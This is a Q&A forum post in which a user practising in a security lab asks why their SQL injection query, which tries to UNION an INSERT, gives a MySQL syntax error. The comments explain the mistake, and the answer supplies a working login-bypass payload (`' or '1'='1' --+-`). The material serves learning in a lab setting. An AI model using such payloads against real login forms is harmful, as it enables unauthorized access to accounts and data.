# SQL Injection in a security lab - wrong syntax?

Tags: mysql, sql, sql-injection

I am practising SQL injection in a security lab. The task is to log into it while my own information in the database may be deleted. While loging in with typing the username and the password the following query will be made:

```
   SELECT 
    name,
    password 
FROM login 
WHERE name='mar' and password='' or '1'='1' 

UNION 
INSERT INTO login (name, password) 
VALUES ('mar', 'hello') 

UNION 

SELECT 
    name,
    password 
FROM login 
WHERE name='mar' and password='hello'
```

However I am always getting the below error message indicating that an error in my sql syntax occured. But I don't know that I did wrong. Can anyone help? Thanks :)

> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'INSERT INTO login (name, password) VALUES ('mar', 'hello') UNION SELECT name,pas' at line 1SELECT name,password FROM login WHERE name='mar' and password='' or '1'='1' UNION INSERT INTO login (name, password) VALUES ('mar', 'hello') UNION SELECT name,password FROM login WHERE name='mar' and password='hello'
>
> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'INSERT INTO login (name, password) VALUES ('mar', 'hello') UNION SELECT name,pas' at line 1

Comment: you can't select then union an insert

Comment: How can you `UNION` with an `INSERT`?  Also, why do you even need to `UNION` *or* `INSERT` in this case?  If you just want to login, `or '1'='1'` may do just that, depending on how the code responds to the results of the query.

Comment: @dbajtr thanks, but then how I can do multiple querys when there is only one "password" field? My idea was that I first insert my username into the table and then use again a select query with that username

Comment: @David I already tried that but it says the the solution is wrong. I guess the username "mar" is not in the table (its deleted). So I need to insert it first and after this I can use SELECT for doing a query for that username. I am not sure how I can do all of this in one input

Answer (score 0):

If you only do :

```
 SELECT 
    name,
    password 
FROM login 
WHERE name='mar' and password='' or '1'='1' --+-
```

This makes the select condition true for every record in the table.
This should let you login with first record in the table.